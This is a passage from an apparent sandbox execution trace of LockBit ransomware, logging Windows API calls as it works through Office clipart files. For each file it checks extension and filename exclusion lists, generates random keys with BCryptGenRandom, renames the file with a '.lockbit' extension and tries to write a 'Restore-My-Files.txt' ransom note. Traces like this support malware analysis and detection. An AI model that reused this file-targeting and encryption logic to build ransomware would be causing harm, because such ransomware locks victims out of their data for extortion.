lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.244] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.244] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.244] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.244] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.244] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.244] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.245] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.245] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.245] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.245] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.245] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.245] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.245] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.245] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.245] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.245] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00130_.GIF") returned 1 [0101.245] lstrcmpiW (lpString1="ntldr", lpString2="AG00130_.GIF") returned 1 [0101.245] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00130_.GIF") returned 1 [0101.245] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00130_.GIF") returned 1 [0101.245] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00130_.GIF") returned 1 [0101.245] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00130_.GIF") returned 1 [0101.245] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00130_.GIF") returned 1 [0101.245] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.245] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned=".GIF" [0101.245] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.245] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.245] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.245] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.246] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.246] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.246] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.246] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.246] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.246] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.246] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.246] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.246] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.246] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.246] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.246] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.246] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.246] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.246] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.246] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.246] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.246] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.246] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.246] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.246] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.247] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.247] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.247] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.247] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.lockbit") returned 72 [0101.247] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xa50 [0101.247] CreateIoCompletionPort (FileHandle=0xa50, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.247] malloc (_Size=0x40068) returned 0x1ff1e60 [0101.248] GetFileSizeEx (in: hFile=0xa50, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5253) returned 1 [0101.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0101.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.253] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0101.253] ReadFile (in: hFile=0xa50, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0101.261] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.261] malloc (_Size=0xa6) returned 0x77d800 [0101.261] NtSetInformationFile (FileHandle=0xa50, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.262] free (_Block=0x77d800) [0101.262] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.262] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.262] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.262] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9b28600, ftCreationTime.dwHighDateTime=0x1bd50ae, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9b28600, ftLastWriteTime.dwHighDateTime=0x1bd50ae, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00135_.GIF", cAlternateFileName="")) returned 1 [0101.262] lstrcmpiW (lpString1=".", lpString2="AG00135_.GIF") returned -1 [0101.262] lstrcmpiW (lpString1="..", lpString2="AG00135_.GIF") returned -1 [0101.263] PathFindExtensionW (pszPath="AG00135_.GIF") returned=".GIF" [0101.263] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.263] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.263] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.263] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.263] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.263] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.263] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.263] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.263] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.263] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.263] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.263] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.263] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.263] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.263] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.263] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.263] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.263] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.263] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.263] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.264] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.264] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.264] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.264] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.264] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.264] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.265] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.265] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.265] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.265] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.265] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.265] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00135_.GIF") returned 1 [0101.265] lstrcmpiW (lpString1="ntldr", lpString2="AG00135_.GIF") returned 1 [0101.265] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00135_.GIF") returned 1 [0101.265] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00135_.GIF") returned 1 [0101.265] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00135_.GIF") returned 1 [0101.265] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00135_.GIF") returned 1 [0101.265] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00135_.GIF") returned 1 [0101.265] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.265] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned=".GIF" [0101.265] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.265] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.265] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.265] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.265] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.265] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.266] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.266] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.266] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.266] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.266] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.266] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.266] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.266] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.266] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.266] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.266] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.266] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.266] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.266] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.266] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.266] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.266] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.266] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.266] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.266] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.266] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.267] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.267] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.lockbit") returned 72 [0101.267] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0101.275] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.275] malloc (_Size=0x40068) returned 0x3e30008 [0101.276] GetFileSizeEx (in: hFile=0x13e4, lpFileSize=0x3e30020 | out: lpFileSize=0x3e30020*=2596) returned 1 [0101.276] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.278] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e7003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e7003c) returned 0x0 [0101.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e7004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e7004c) returned 0x0 [0101.280] ReadFile (in: hFile=0x13e4, lpBuffer=0x3e3003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008) returned 1 [0101.297] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.297] malloc (_Size=0xa6) returned 0x77d800 [0101.297] NtSetInformationFile (FileHandle=0x13e4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.298] free (_Block=0x77d800) [0101.298] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.298] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.298] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.299] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3bca500, ftCreationTime.dwHighDateTime=0x1bd50ae, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3bca500, ftLastWriteTime.dwHighDateTime=0x1bd50ae, nFileSizeHigh=0x0, nFileSizeLow=0x296f, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00139_.GIF", cAlternateFileName="")) returned 1 [0101.299] lstrcmpiW (lpString1=".", lpString2="AG00139_.GIF") returned -1 [0101.299] lstrcmpiW (lpString1="..", lpString2="AG00139_.GIF") returned -1 [0101.299] PathFindExtensionW (pszPath="AG00139_.GIF") returned=".GIF" [0101.299] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.299] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.299] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.299] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.299] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.299] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.299] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.299] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.299] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.299] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.299] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.299] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.299] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.299] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.299] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.299] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.300] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.300] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.300] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.300] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.300] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.300] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.301] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.301] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.301] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.301] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.301] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.301] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.301] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.301] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.301] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00139_.GIF") returned 1 [0101.301] lstrcmpiW (lpString1="ntldr", lpString2="AG00139_.GIF") returned 1 [0101.301] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00139_.GIF") returned 1 [0101.301] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00139_.GIF") returned 1 [0101.301] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00139_.GIF") returned 1 [0101.301] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00139_.GIF") returned 1 [0101.301] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00139_.GIF") returned 1 [0101.301] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.301] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned=".GIF" [0101.301] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.301] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.301] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.301] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.301] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.302] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.302] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.302] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.302] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.302] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.302] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.302] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.302] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.302] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.302] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.302] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.302] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.302] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.302] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.302] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.302] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.302] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.302] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.302] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.302] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.302] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.302] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.303] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.303] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.lockbit") returned 72 [0101.303] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x334 [0101.311] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.311] malloc (_Size=0x40068) returned 0x3d70048 [0101.311] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=10607) returned 1 [0101.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) 